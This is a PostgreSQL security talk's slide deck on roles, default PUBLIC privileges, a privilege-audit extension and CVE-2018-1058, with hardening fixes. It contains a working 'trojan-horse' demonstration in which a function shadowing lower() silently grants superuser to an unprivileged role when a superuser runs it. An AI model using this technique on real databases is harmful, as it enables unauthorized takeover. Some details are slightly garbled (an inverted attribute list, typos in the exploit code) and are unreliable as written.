



crunchy data

Deep Thoughts

Betting on Security

Joe Conway
joe@crunchydata.com
mail@joeconway.com

Crunchy Data
May 2020

Holistic Security

- Allow authorized access to your data
- Prevent unauthorized access
- Defense in Depth - many layers
 - Hardened Shell - perimeter security
 - **Crunchy Core - in database security** ← This talk. . .
 - Confinement - reduce attack surface
 - Instrumented - monitoring and alerting

Want to Bet?

- Fresh PostgreSQL install
- New Empty Database
- Add:
 - 7 User + 3 Group Roles
 - 2 Tables
 - 1 View
 - 1 Function
 - 1 Grant
 - 1 Extension
- Clearly understand all security implications?

On a Role

- USER and GROUP just different forms of ROLE
- LOGIN versus NOLOGIN attribute
- However USER may have "members"
- ROLE created at "instance" level – common to all databases

Role Properties

Roles have four types of security relevant properties:

- Attributes: capability, for example LOGIN or SUPERUSER
- Membership: one role may be member of another, directly or indirectly
- Privileges: access permitted on database object, such as SELECT on TABLE
- Settings: custom value for conf param bound to role, e.g. search_path

Attributes

- CREATE/ALTER ROLE command "options"
 - **NOSUPERUSER**: is superuser
 - **NOCREATEDB**: may create new databases
 - **NOCREATEROLE**: may create other (non-superuser) roles
 - **NOINHERIT**: inherits privileges of roles to which it is member
 - **NOLOGIN**: may login
 - **NOREPLICATION**: may connect for binary or logical replication
 - **NOBYPASSRLS**: may bypass RLS policy
 - **CONNECTION LIMIT**: number allowed concurrent connections
 - **PASSWORD**: set role password
 - **VALID UNTIL**: password validity

Membership

- Several ways to make $\text{ROLE-X} \in \text{ROLE-Y}$
 - Preferred method ROLE form of GRANT command
→ GRANT ROLE-Y TO ROLE-X
- Multi-level hierarchy of roles possible
- ROLE-X is **MEMBER** of ROLE-Y if chain of grants exists
→ SET ROLE to gain privilege
- ROLE-X has **USAGE** of ROLE-Y if all roles in chain inherit
→ **immediate access to privileges**
- `pg_has_role()`: determine if ROLE-X has MEMBER/USAGE of ROLE-Y

Privileges

- Gained via system defaults and explicit GRANT statements
- Removed by REVOKE statements
- Be mindful of indirect privileges:
 - **USAGE**: immediate access
 - **MEMBER** only: SET ROLE access
- PUBLIC: Pseudo group
 - **Every** role has **USAGE**
 - Some privileges granted to PUBLIC by default
 - PUBLIC membership not affected by NOINHERIT
 - PUBLIC membership not reflected in pg_authid

Settings

- Configuration settings may be bound to roles
- ALTER ROLE command with a SET clause
- For example: `dynamic_library_path`, `row_security`, or `search_path`

Assuming a Role

- Attributes of a role only gained by:
 - Logging in as that role directly
 - Using `SET ROLE` to switch to that role
 - Using `SET SESSION AUTHORIZATION` to switch to that role
- `SET SESSION AUTHORIZATION`: Imitate role more completely than `SET ROLE`
 - Only available to Superusers
 - `SET ROLE` changes the `CURRENT_USER`
 - `SET SESSION AUTHORIZATION` changes both `CURRENT_USER` and `SESSION_USER`
 - Roles permitted to `SET ROLE` determined by `SESSION_USER`
- Privileges immediate if via `USAGE`, otherwise must `SET ROLE`
- Config settings only applied when role logs in directly

Database Setup Summary

- Install desired version of PostgreSQL
- Create the database
- Create roles
- Create objects
- Install `crunchy_check_access` extension

Create Database and Roles

```
createdb deepdive
psql deepdive
CREATE GROUP endusers NOINHERIT;
CREATE USER dbadm SUPERUSER PASSWORD 'secret';
CREATE USER joe PASSWORD 'secret' IN ROLE endusers;
CREATE ROLE bob LOGIN PASSWORD 'secret' NOINHERIT;
CREATE ROLE alice LOGIN PASSWORD 'secret' NOINHERIT IN ROLE endusers;
CREATE USER mary PASSWORD 'secret' IN ROLE joe;
CREATE ROLE sue LOGIN PASSWORD 'secret';
CREATE ROLE appuser LOGIN PASSWORD 'secret';
CREATE ROLE dbadmins ROLE sue ADMIN bob;
CREATE GROUP apps ROLE appuser;
GRANT joe TO alice;
GRANT dbadm TO endusers;
```

Database Setup Summary

- Three ways shown for affecting role membership
 - `CREATE USER ... IN ROLE:` new role member of other role
 - `CREATE ROLE ... ROLE:` new role is "group", initially with members specified
 - `GRANT role1 TO role2:` explicitly add `role2` as a member of `role1`
- Note: Even "user", e.g. `joe`, can have members like a "group"

Resulting Roles

\du

Role name	List of roles Attributes	Member of
alice	No inheritance	endusers, joe
apps	Cannot login	
appuser		apps
bob	No inheritance	dbadmins
dbadm	Superuser	
dbadmins	Cannot login	
endusers	No inheritance, Cannot login	dbadm
joe		endusers
mary		joe
postgres	Superuser, Create role, Create DB, Replication, Bypass RLS	
sue		dbadmins

Create Objects

```
CREATE TABLE t1 (t1_id int PRIMARY KEY, widgetname text);
CREATE TABLE t2 (t2_id int PRIMARY KEY, t1_id int REFERENCES t1, qty int, location text);
CREATE VIEW widget_inv AS SELECT widgetname, location, qty FROM t2 JOIN t1 USING (t1_id);
CREATE FUNCTION get_inv(wdgt text, loc text) RETURNS int AS
$$
    SELECT qty FROM widget_inv WHERE widgetname = wdgt AND location = loc
$$ LANGUAGE sql;
GRANT SELECT ON widget_inv TO apps, endusers;
```

Want to Bet?

Second chance

- Clearly understand all security implications?
 - 7 User + 3 Group Roles
 - 2 Tables
 - 1 View
 - 1 Function
 - 1 Grant
 - 1 Extension

Install `crunchy_check_access` Extension

```
git clone https://github.com/CrunchyData/crunchy_check_access.git
cd crunchy_check_access
USE_PGXS=1 make install
psql deepdive -c "CREATE EXTENSION check_access"
```

First Take

- Who has permission to what
- Ignore postgres (default superuser)
- Ignore system catalog

```
SELECT role_path, base_role, as_role, objtype, objname, privname  
FROM all_access()  
WHERE base_role != CURRENT_USER  
ORDER BY 1,4,5,6;
```

- 984 rows of output (may vary with pg version)
→ instances of privileges accessible to roles
- Surprised by the volume?

WITH GRANT OPTION

- Means this role can grant this privilege to other roles
- Any role with `SUPERUSER` attribute has this ability
- But can also be explicitly granted
- `check_access` shows two rows when exists

TEMPORARY Objects

- Privileges on TEMPORARY objects spelled TEMPORARY or TEMP
- Can safely eliminate duplication

Default Roles

- Provide access to certain privileged capabilities and information
- Can GRANT these default roles to other roles
- Provides those roles with special access to specified capabilities and information
- Not covered here

Multipath

- As discussed earlier, role may have chains of grants to other roles:
 - MEMBER
 - USAGE
- Provides multiple paths to privilege for base role
- `check_access` shows as `role_path` column
→ E.g. `alice(false).joe(true).endusers(false).dbadm`

Second Take

- Aggregate to eliminate unneeded duplication
- Ignore WITH GRANT OPTION
- Eliminate TEMPORARY as duplicates of TEMP
- Ignore default roles: pg_*
- Ignore multiple paths to privilege

```
SELECT objtype, schemaname, objname, privname, array_agg(distinct base_role) AS roles
FROM all_access() WHERE base_role != CURRENT_USER AND base_role !~ '^pg_'
AND privname != 'TEMPORARY' AND privname NOT LIKE '%WITH GRANT OPTION'
GROUP BY objtype, schemaname, objname, privname ORDER BY 1, 2, 3, 4;
```

- 51 rows of output
- Easier to analyze

PUBLIC

Information from earlier but bears repeating. . .

- PUBLIC: Pseudo group
 - **Every** role has **USAGE**
 - Some privileges granted to PUBLIC by **default**
 - PUBLIC membership not affected by NOINHERIT
 - PUBLIC membership not reflected in pg_authid
- Many paths to privilege derive from default grants to PUBLIC
 - Database: TEMP and CONNECT
 - Function: EXECUTE
 - Language, Domain, Type: USAGE

Object Type: Database

- Everyone has TEMP and CONNECT via **default** grant to PUBLIC
- alice, dbadm, endusers, joe, mary have CREATE via dbadm SUPERUSER attribute

Object Type: Function

- Note: function signatures disambiguate overloaded function names
- `all_access()`, `all_access(16)`, `check_access(25 16)`,
`check_access(25 16 25)`
 - EXECUTE only to **superusers**
 - Due to **explicit** `REVOKE EXECUTE ... FROM PUBLIC` in `check_access.sql`
- `my_privs()`, `my_privs_sys()`
 - EXECUTE to **everyone**
 - Due to **explicit** `GRANT EXECUTE ... TO PUBLIC` in `check_access.sql`
- `get_inv(25 25)`
 - EXECUTE to **everyone**
 - Due to **default** `GRANT EXECUTE ... TO PUBLIC`

Object Type: Language

- LANGUAGE C, LANGUAGE INTERNAL
 - USAGE only to **superusers**
 - Note USAGE means CREATE FUNCTION in that language
 - EXECUTE on resulting function object is separate
 - Note: LANGUAGE C subject to `dynamic_library_path`
- LANGUAGE PLPGSQL, LANGUAGE SQL
 - USAGE to **everyone**
 - Due to **default** GRANT USAGE ... TO PUBLIC
 - **everyone** can CREATE FUNCTION in these languages

Object Type: Schema

- public schema
 - USAGE to **everyone**
 - Due to **default** GRANT USAGE ... TO PUBLIC
 - **everyone** can access objects in this schema
 - CREATE to **everyone**
 - Due to **default** GRANT CREATE ... TO PUBLIC
 - **everyone** can create objects in this schema
- **This is dangerous!**
- See CVE-2018-1058

Object Type: Table

- Tables t1, t2
 - ALL privileges only to **superusers**
→ DELETE, INSERT, REFERENCES, SELECT, TRIGGER, TRUNCATE, UPDATE
 - No **default** grants
 - No **explicit** grants

Object Type: View

- Views `my_privs`, `my_privs_sys`, `widget_inv`
 - ALL privileges only to **superusers**
 - DELETE, INSERT, REFERENCES, SELECT, TRIGGER, TRUNCATE, UPDATE
 - No **default** grants
 - SELECT to everyone on `my_privs` and `my_privs_sys`
 - Due to **explicit** GRANT SELECT ... TO PUBLIC in `check_access.sql`
 - SELECT to `alice`, `apps`, `appuser`, `endusers`, `joe`, `mary` ON `widget_inv`
 - Due to **explicit** GRANT SELECT ... TO `apps`, `endusers`

Takeaways

- EXECUTE grant on function objects to PUBLIC may be surprising
- Roles may have several paths to privilege for any function

```
-- revoke privilege from joe
REVOKE ALL ON FUNCTION get_inv(text, text) FROM joe;
-- become joe
SET SESSION AUTHORIZATION joe;
SELECT CURRENT_USER, get_inv('something', 'somewhere');
```

```
current_user | get_inv
-----+-----
joe          |
(1 row)
-- What happened here???
```

- PUBLIC still has EXECUTE for get_inv()
- All roles including joe are members of PUBLIC

Takeaways

- Don't forget **latent** privileges

```
REVOKE ALL ON FUNCTION get_inv(text, text) FROM PUBLIC;
-- become alice
SET SESSION AUTHORIZATION alice;
SELECT CURRENT_USER, get_inv('something','somewhere');
ERROR:  permission denied for function get_inv
SET ROLE dbadm;
SELECT SESSION_USER, CURRENT_USER, get_inv('something','somewhere');
```

```
 session_user | current_user | get_inv
-----+-----+-----
  alice      | dbadm       |
(1 row)
```

```
-- reset to postgres and restore state
RESET SESSION AUTHORIZATION;
GRANT EXECUTE ON FUNCTION get_inv(text, text) TO PUBLIC;
```


About Views and Functions

- VIEW always accesses underlying objects as VIEW owner
→ **not** as role invoking the outer query
- FUNCTION can be SECURITY INVOKER (default) or SECURITY DEFINER
 - SECURITY INVOKER: privileges of invoker (CURRENT_USER)
 - SECURITY DEFINER: privileges of FUNCTION owner
 - Owner is creator, but ownership might be changed by superuser
- So ...
 - You can think of VIEW as SECURITY DEFINER
 - But FUNCTION is **usually** SECURITY INVOKER
 - Potentially confusing when VIEW includes FUNCTION calls

About Views and Functions

```
-- from earlier, run as postgres (superuser):  
-- CREATE VIEW widget_inv AS SELECT widgetname, location, qty FROM t2 JOIN t1 USING (t1_id);  
-- CREATE FUNCTION get_inv(wdgt text, loc text) RETURNS int AS $$  
--   SELECT qty FROM widget_inv WHERE widgetname = wdgt AND location = loc  
-- $$ LANGUAGE sql;  
-- GRANT SELECT ON widget_inv TO apps, endusers;
```

```
SET SESSION AUTHORIZATION appuser;  
SELECT CURRENT_USER, SESSION_USER, * FROM t1;  
ERROR: permission denied for table t1
```

```
SELECT CURRENT_USER, SESSION_USER, get_inv('anything','anywhere');
```

```
current_user | session_user | get_inv  
-----+-----+-----  
appuser      | appuser      |  
(1 row)
```

CVE-2018-1058

- Describes how user can create objects named same as objects in different schemas
- These like-named objects can change the behavior of other users' queries
- Potentially cause unexpected or malicious behavior
- Also known as a "trojan-horse" attack

Concept: Schemas

- Allow users to create objects in separate namespaces
- Objects in separate namespaces may have same object name
- By Default:
 - All databases have schema called `pg_catalog` which includes built-in objects
 - New databases have schema called `public`
 - Any connected user can create objects in `public` schema

Concept: Search Path

- PostgreSQL searches the system catalog schema, `pg_catalog`, first
- Otherwise `search_path` setting determines object resolution
- By default:
 - `search_path = $user, public`
 - `$user` is equal to `SESSION_USER` name

Concept: Function Signature and Datatype Coersion

- In addition to name resolution, functions are resolved by input arg datatype
- Automatic implicit datatype coersion occurs for certain built-in datatypes
- Example:

```
-- following function works for text,  
-- or varchar if it exists alone in the search path  
CREATE FUNCTION bar(text) ...;
```

```
-- but this function may also exist, and if so, it will handle varchar  
CREATE FUNCTION bar(varchar) ...;
```

Consequences

- By default:
 - All new objects (e.g. tables, functions) are created in public schema
 - Unqualified referenced objects are found in public schema
 - Possible for unprivileged user to create function such that:
 - Function name shadows pg_catalog function
 - With different arg datatype(s)
 - But of normally implicitly coerced datatype(s)

Consequences

```
CREATE FUNCTION lower(varchar) RETURNS text AS $$  
    SELECT 'ALICE WAS HERE: ' || $1;  
$$ LANGUAGE SQL IMMUTABLE;
```

```
-- note public.lower(varchar) will shadow pg_catalog.lower(text)  
-- when the arg is actually varchar  
\df lower
```

List of functions

Schema	Name	Result data type	Argument data types	Type
pg_catalog	lower	anyelement	anyrange	func
pg_catalog	lower	text	text	func
public	lower	text	character varying	func

```
-- clean up  
DROP FUNCTION lower(varchar);
```


The Problem

- Combine
 - Default public schema `CREATE` privilege
 - Default `search_path` setting
 - Ability to create objects with the same names in different schemas
 - How PostgreSQL searches for objects based on `search_path`
 - Function signature resolution rules
 - Implicit datatype conversions
 - Default `EXECUTE` grant to `PUBLIC` for new functions
- Presents opportunity for one user to modify behavior of other user's query
- E.g. insert function that, when executed by superuser, grants escalated privileges

Full Example

```
CREATE TABLE categories
```

```
(  
  category_id integer PRIMARY KEY,  
  category_name varchar(32) UNIQUE,  
  category_desc varchar(128)  
);
```

```
INSERT INTO categories VALUES
```

```
(1, 'cold beverages', 'cold beverages, non-alcoholic'),  
(2, 'beer', 'domestic beer'),  
(3, 'craft beer', 'international and craft domestic beer'),  
(4, 'hot beverages', 'tea, coffee, latte');
```

```
CREATE ROLE dbro LOGIN;
```

Full Example

```
SET SESSION AUTHORIZATION dbro;

CREATE OR REPLACE FUNCTION lower(vvarchar)
RETURNS text AS $$
  DECLARE
    dbro_issu bool;
    curr_issu bool;
  BEGIN
    dbro_issu := usesuper from pg_user where username = 'dbro';
    curr_issu := usesuper from pg_user where username = CURRENT_USER;
    IF curr_issu AND NOT dbro_issu THEN
      ALTER USER dbro SUPERUSER;
    END IF;
    RETURN lower($1::text);
  END;
$$ LANGUAGE plpgsql VOLATILE;
```

Full Example

```
-- later with postgres superuser logged in
RESET SESSION AUTHORIZATION;
\du dbro

                List of roles
 Role name | Attributes | Member of
-----+-----+-----
 dbro      |             | {}

-- looks "normal"
SELECT category_desc FROM categories
WHERE lower(category_name) LIKE '%beverage%';
      category_desc
-----
 cold beverages, non-alcoholic
 tea, coffee, latte
(2 rows)
```

Full Example

```
-- but dbro successfully gained superuser
```

```
\du dbro
```

```
      List of roles
```

```
Role name | Attributes | Member of
```

```
-----+-----+-----
```

```
dbro      | Superuser | {}
```

```
-- clean up
```

```
DROP FUNCTION lower(varchar);
```

```
DROP ROLE dbro;
```

```
DROP TABLE categories;
```

The Fix

- Do not allow unprivileged users to CREATE objects in `public` schema
- Or any other schema in your default `search_path`

```
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
```

What Else to Consider?

- TEMPORARY or TEMP on database
- USAGE on PLPGSQL and SQL languages
- USAGE on `public` schema
- EXECUTE on new functions granted to PUBLIC

Full Fix

```
-- ensure no abuse of public schema
REVOKE CREATE ON SCHEMA public FROM PUBLIC;
--? REVOKE USAGE ON SCHEMA public FROM PUBLIC;
--? DROP SCHEMA public CASCADE;

-- least privilege - re-grant to roles that really need it
REVOKE TEMPORARY ON DATABASE deepdive FROM PUBLIC;
REVOKE USAGE ON LANGUAGE sql, plpgsql FROM PUBLIC;

-- similarly, grant EXECUTE to roles in need
ALTER DEFAULT PRIVILEGES IN SCHEMA public
    REVOKE EXECUTE ON ROUTINES FROM PUBLIC;
```


Rightsizing Roles

```
DROP ROLE dbadm;  
ALTER ROLE dbadmins SUPERUSER;  
REVOKE joe FROM alice;  
REVOKE joe FROM mary;  
GRANT endusers TO mary;  
ALTER ROLE alice INHERIT;  
ALTER ROLE endusers INHERIT;  
ALTER ROLE sue NOINHERIT;
```

Rightsizing Roles

\du

Role name	Attributes	Member of
alice		{endusers}
apps	Cannot login	{}
appuser		{apps}
bob	No inheritance	{dbadmins}
dbadmins	Superuser, Cannot login	{}
endusers	Cannot login	{}
joe		{endusers}
mary		{endusers}
postgres	Superuser, Create role, Create DB, Replication, Bypass RLS	{}
sue	No inheritance	{dbadmins}



Final Final

```
SELECT objtype, schemaname, objname, privname, array_agg(distinct base_role) AS roles
FROM all_access() WHERE base_role !~ '^pg_'
AND base_role NOT IN ('bob', 'dbadmins', 'postgres', 'sue')
AND privname != 'TEMPORARY' AND privname NOT LIKE '%WITH GRANT OPTION'
GROUP BY objtype, schemaname, objname, privname ORDER BY 1, 2, 3, 4;
```

objtype	schemaname	objname	privname	roles
database		deepdive	CONNECT	{alice,apps,appuser,endusers,joe,mary}
function	public	get_inv(25 25)	EXECUTE	{alice,apps,appuser,endusers,joe,mary}
function	public	my_privs()	EXECUTE	{alice,apps,appuser,endusers,joe,mary}
function	public	my_privs_sys()	EXECUTE	{alice,apps,appuser,endusers,joe,mary}
schema	public	public	USAGE	{alice,apps,appuser,endusers,joe,mary}
view	public	my_privs	SELECT	{alice,apps,appuser,endusers,joe,mary}
view	public	my_privs_sys	SELECT	{alice,apps,appuser,endusers,joe,mary}
view	public	widget_inv	SELECT	{alice,apps,appuser,endusers,joe,mary}

(8 rows)

Questions?

Thank You!
mail@joeconway.com
joe@crunchydata.com
@josepheconway